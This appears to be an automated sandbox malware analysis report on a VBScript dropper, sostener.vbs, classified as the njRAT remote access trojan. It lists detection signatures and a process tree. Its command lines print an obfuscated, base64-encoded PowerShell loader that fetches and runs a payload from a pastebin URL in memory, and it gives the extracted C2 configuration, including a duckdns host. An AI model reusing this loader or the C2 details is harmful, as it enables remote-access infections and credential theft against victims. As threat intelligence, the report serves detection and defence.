Edit tour
Windows
Analysis Report
sostener.vbs
Overview
General Information
| Sample name: | sostener.vbs |
| Analysis ID: | 1516343 |
| MD5: | 8476643328f5fd81e1144a3f9b340a7f |
| SHA1: | 2b07f0425c5ac7a7b8ac33f903780d740769e92f |
| SHA256: | 3f15c83a041604541d777c6837797d4b28196f3a6926375324a2dbfb993823c0 |
| Tags: | user-lontze7 |
| Infos: |   |
 | |
Detection
Njrat
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Njrat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6648 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\soste ner.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 5104 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ LoPuennnTe s = 'J?Bh? HU?YwBs?HI ?I??9?C??J w?w?Cc?Ow? k?GM?ZQB1? G8?cw?g?D0 ?I??n?CU?c ?B6?EE?YwB P?Gc?SQBu? E0?cg?l?Cc ?OwBb?FM?e QBz?HQ?ZQB t?C4?TgBl? HQ?LgBT?GU ?cgB2?Gk?Y wBl?F??bwB p?G4?d?BN? GE?bgBh?Gc ?ZQBy?F0?O g?6?FM?ZQB y?HY?ZQBy? EM?ZQBy?HQ ?aQBm?Gk?Y wBh?HQ?ZQB W?GE?b?Bp? GQ?YQB0?Gk ?bwBu?EM?Y QBs?Gw?YgB h?GM?aw?g? D0?I?B7?CQ ?d?By?HU?Z QB9?Ds?WwB T?Hk?cwB0? GU?bQ?u?E4 ?ZQB0?C4?U wBl?HI?dgB p?GM?ZQBQ? G8?aQBu?HQ ?TQBh?G4?Y QBn?GU?cgB d?Do?OgBT? GU?YwB1?HI ?aQB0?Hk?U ?By?G8?d?B v?GM?bwBs? C??PQ?g?Fs ?UwB5?HM?d ?Bl?G0?LgB O?GU?d??u? FM?ZQBj?HU ?cgBp?HQ?e QBQ?HI?bwB 0?G8?YwBv? Gw?V?B5?H? ?ZQBd?Do?O gBU?Gw?cw? x?DI?OwBb? EI?eQB0?GU ?WwBd?F0?I ??k?HU?awB s?Gk?Yg?g? D0?I?Bb?HM ?eQBz?HQ?Z QBt?C4?QwB v?G4?dgBl? HI?d?Bd?Do ?OgBG?HI?b wBt?EI?YQB z?GU?Ng?0? FM?d?By?Gk ?bgBn?Cg?I ??o?E4?ZQB 3?C0?TwBi? Go?ZQBj?HQ ?I?BO?GU?d ??u?Fc?ZQB i?EM?b?Bp? GU?bgB0?Ck ?LgBE?G8?d wBu?Gw?bwB h?GQ?UwB0? HI?aQBu?Gc ?K??g?Cg?T gBl?Hc?LQB P?GI?agBl? GM?d??g?E4 ?ZQB0?C4?V wBl?GI?QwB s?Gk?ZQBu? HQ?KQ?u?EQ ?bwB3?G4?b ?Bv?GE?Z?B T?HQ?cgBp? G4?Zw?o?Cc ?a?B0?HQ?c ??6?C8?LwB w?GE?cwB0? GU?YgBp?G4 ?LgBj?G8?b Q?v?HI?YQB 3?C8?Vg?5? Hk?NQBR?DU ?dgB2?Cc?K Q?g?Ck?I?? p?Ds?WwBz? Hk?cwB0?GU ?bQ?u?EE?c ?Bw?EQ?bwB t?GE?aQBu? F0?Og?6?EM ?dQBy?HI?Z QBu?HQ?R?B v?G0?YQBp? G4?LgBM?G8 ?YQBk?Cg?J ?B1?Gs?b?B p?GI?KQ?u? Ec?ZQB0?FQ ?eQBw?GU?K ??n?FQ?ZQB o?HU?b?Bj? Gg?ZQBz?Fg ?e?BY?Hg?e ??u?EM?b?B h?HM?cw?x? Cc?KQ?u?Ec ?ZQB0?E0?Z QB0?Gg?bwB k?Cg?JwBN? HM?cQBC?Ek ?YgBZ?Cc?K Q?u?Ek?bgB 2?G8?awBl? Cg?J?Bu?HU ?b?Bs?Cw?I ?Bb?G8?YgB q?GU?YwB0? Fs?XQBd?C? ?K??n?Fg?d QBN?E4?dQB U?Gg?aQ?v? Hc?YQBy?C8 ?bQBv?GM?L gBu?Gk?YgB l?HQ?cwBh? H??Lw?v?Do ?cwBw?HQ?d ?Bo?Cc?I?? s?C??J?Bj? GU?dQBv?HM ?I??s?C??J wBf?F8?XwB J?G4?dgBp? GM?d?B1?HM ?XwBf?F8?X wBf?F8?XwB f?F8?XwBf? F8?XwBf?F8 ?XwBf?F8?X wBf?F8?XwB f?F8?XwBf? F8?XwBf?F8 ?XwBf?F8?X wBf?F8?XwB f?F8?XwBf? C0?LQ?t?C0 ?LQ?t?C0?J w?s?C??J?B h?HU?YwBs? HI?L??g?Cc ?MQ?n?Cw?I ??n?FI?bwB k?GE?Jw?g? Ck?KQ?7??= =';$KByHL = [system. Text.Encod ing]::Unic ode.GetStr ing( [syst em.Convert ]::FromBas e64String( $LoPuennn Tes.replac e('?','A') ) );$KByH L = $KByHL .replace(' %pzAcOgInM r%', 'C:\U sers\user\ Desktop\so stener.vbs ');powersh ell $KByHL ; MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 2404 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4236 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$auclr = '0';$ceuos = 'C:\Use rs\user\De sktop\sost ener.vbs'; [System.Ne t.ServiceP ointManage r]::Server Certificat eValidatio nCallback = {$true}; [System.Ne t.ServiceP ointManage r]::Securi tyProtocol = [System .Net.Secur ityProtoco lType]::Tl s12;[Byte[ ]] $uklib = [system. Convert]:: FromBase64 String( (N ew-Object Net.WebCli ent).Downl oadString( (New-Obje ct Net.Web Client).Do wnloadStri ng('http:/ /pastebin. com/raw/V9 y5Q5vv') ) );[system .AppDomain ]::Current Domain.Loa d($uklib). GetType('T ehulchesXx Xxx.Class1 ').GetMeth od('MsqBIb Y').Invoke ($null, [o bject[]] ( 'XuMNuThi/ war/moc.ni betsap//:s ptth' , $c euos , '__ _Invictus_ __________ __________ __________ __________ -------', $auclr, '1 ', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9) 
RegAsm.exe (PID: 7456 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| NjRAT | RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored. |
{"Host": "michael2009nj.duckdns.org", "Port": "2828", "Campaign ID": "NYAN CAT", "Network Seprator": "@!#&^%$", "Registry": "bf4e531b630e4de6ab2"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL | Detects executables (downloaders) containing reversed URLs to raw contents of a paste | ditekSHen |
| |
| MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen |
| |
| JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
| Click to see the 7 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL | Detects executables (downloaders) containing reversed URLs to raw contents of a paste | ditekSHen |
| |
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL | Detects executables (downloaders) containing reversed URLs to raw contents of a paste | ditekSHen |
| |
| MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL | Detects executables (downloaders) containing reversed URLs to raw contents of a paste | ditekSHen |
| |
| Click to see the 11 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||